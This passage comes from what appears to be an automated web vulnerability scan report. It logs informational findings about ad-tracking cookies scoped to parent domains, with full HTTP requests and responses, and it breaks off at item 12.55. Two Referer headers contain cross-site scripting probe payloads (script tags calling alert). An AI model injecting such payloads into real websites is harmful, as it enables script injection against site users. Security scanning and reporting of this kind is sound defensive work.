Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 13 Jun 2011 11:25:42 GMT
Location: http://pix04.revsci.net/D10889/a1/0/3/0.gif?D=DM_LOC=http://bizo.com?&seniority=executive&industry=business_services&functional_area=it_systems_analysts&functional_area=information_technology&location=texas&group=tech_business_professional&group=high_net_worth
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0Wm24107qgSVExkNK7HUtFp4B4dlWpgdhN4mIk5QrdBD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvpyipewHlOhwIG1G4rZ9utJNJRFsRyXovJWz7fUPpX3ydWr1XIQIIGVXmipwPmwHj2LBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

12.48. http://apr.lijit.com///www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apr.lijit.com
Path:	///www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:03 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET ///www/delivery/ajs.php?zoneid=114244&username=sbnation&numAds=1&premium=1&eleid=lijit_region_114244&abf=true&tid=114244_130796292133131cdf6ea0211&lijit_kw=&cb=95414334325&flv=10.3.181&time=06:02:01&ifr=0&loc=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: apr.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:03 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n34 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 3850
Content-Type: application/x-javascript; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; expires=Tue, 12-Jun-2012 11:02:03 GMT; path=/; domain=.lijit.com

var MAX_c5bb7ce1 = '';
MAX_c5bb7ce1 += "%3Cscript%20language%3D%22JavaScript%22%3E%0Alwp_parent_ad_id%3D4282%3B%0Aif%20(typeof%20ljt_beacon_vals%20%3D%3D%20%22undefined%22)%20%7B%0A%20%20ljt_beacon_va
...[SNIP]...

12.49. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; expires=Tue 14-Jun-2011 11:34:28 GMT; path=/; domain=.voicefive.com;
ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; expires=Sun 11-Sep-2011 11:34:28 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p104567837&PRAd=63567813&AR_C=42361216 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307964392%2E087%2Cwait%2D%3E35000%2C

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Mon, 13 Jun 2011 11:34:28 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; expires=Tue 14-Jun-2011 11:34:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; expires=Sun 11-Sep-2011 11:34:28 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p104567837&c3=63567813&c4=42361216&c5=&c6=2&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1307964868
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

12.50. http://ar.voicefive.com/b/recruitBeacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307964080; expires=Tue 14-Jun-2011 11:21:20 GMT; path=/; domain=.voicefive.com;
ar_p20101109=exp=3&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:21:20 2011&prad=11794&arc=15313&; expires=Sun 11-Sep-2011 11:21:20 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p20101109&PRAd=11794&AR_C=15313 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=1&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 6 11:54:51 2011&prad=18466&arc=15314&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Mon, 13 Jun 2011 11:21:20 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307964080; expires=Tue 14-Jun-2011 11:21:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p20101109=exp=3&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:21:20 2011&prad=11794&arc=15313&; expires=Sun 11-Sep-2011 11:21:20 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p20101109&c3=11794&c4=15313&c5=&c6=3&c7=Mon%20Jun%20%206%2011%3A54%3A51%202011&c8=&c9=&c10=&c15=&rn=1307964080
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

12.51. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1307963602.056,wait-%3E10000,&1307963603594 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_G=method->-1,ts->1307963601; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:27 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.52. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:38 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:38 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97464717&PRAd=1468426&AR_C=150255 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:27:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97464717=exp=2&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:27:38 2011&prad=1468426&arc=150255&; expires=Sun 11-Sep-2011 11:27:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30454

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1468426",Pid:"p97464717",Arc:"150255",Location:COMSC
...[SNIP]...

12.53. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAU0bin3BdJCKyaHKNnfZTY_uD12G4DA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMTDIVzLKMDIwsGxgFAVSDAaMDEAqfSpYUPEEIzeQt3wpWG6dB5iSWsLIDxRcdI4R6ACGZfWMgkAe0C97xNNB5jIwAADD0S85; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:21:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=12980&rnd=b9498835-6d60-422a-b13d-e2f25671c04c HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUIXlXfzJGygZghUOxxgsWvYW6eqoDA3gBY2BgYGRgynjEwPL0FwOj2ioGhnv5DAwMnEBhA5kbqsuBbDDwfXapgYGDgUG.klGQkYGBZQMjF5BSPMEI1M6QPhUsKLWEkQXIW.cBllu.FEwtq2dkAwoyGgQ.irgOMQsA2FgUGQ--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU0bin3BdJCKyaHKNnfZTY_uD12G4DA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.HUu1uLF6edu1V1gXoZfL8GMzBwMTDIVzLKMDIwsGxgFAVSDAaMDEAqfSpYUPEEIzeQt3wpWG6dB5iSWsLIDxRcdI4R6ACGZfWMgkAe0C97xNNB5jIwAADD0S85; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:21:26 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Mon, 13 Jun 2011 11:21:25 GMT

12.54. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:01:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=5964888&rn=0.7589954100549221&c7=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&c3=2&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&cv=1.8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 11:01:21 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:01:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.55. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

